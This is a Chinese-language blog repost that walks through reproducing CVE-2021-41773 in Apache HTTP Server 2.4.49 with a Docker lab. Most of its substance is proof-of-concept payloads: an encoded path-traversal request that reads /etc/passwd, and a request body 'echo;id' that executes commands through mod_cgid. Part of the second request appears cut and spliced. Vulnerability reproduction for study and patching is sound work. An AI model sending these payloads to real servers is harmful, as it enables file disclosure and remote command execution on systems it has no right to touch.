栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Java

CVE-2021-41773 Apache HTTP Server漏洞复现

Java 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

CVE-2021-41773 Apache HTTP Server漏洞复现

存在漏洞的版本:仅影响Apache HTTP Server 2.4.49版本

推荐环境:GitHub - blasty/CVE-2021-41773: CVE-2021-41773 playground

下载后:

docker-compose build && docker-compose up

如果遇到:

 则进入容器,修改

vim /etc/apache2/apache2.conf

最后一行加入:

ServerName localhost:80 

修改后重启:

apachectl restart

Poc:

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,**
Content-Length: 7
Content-Type: application/x-www-form-urlencoded
Connection: close

echo;id

注意:这里需要开启mod_cgid

ls /etc/apache2/mods-available/ |grep cgi

 

 

参考:CVE-2021-41773升华篇-Apache HTTP Server 路径穿越漏洞提升至RCE回显深入分析 

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/305640.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号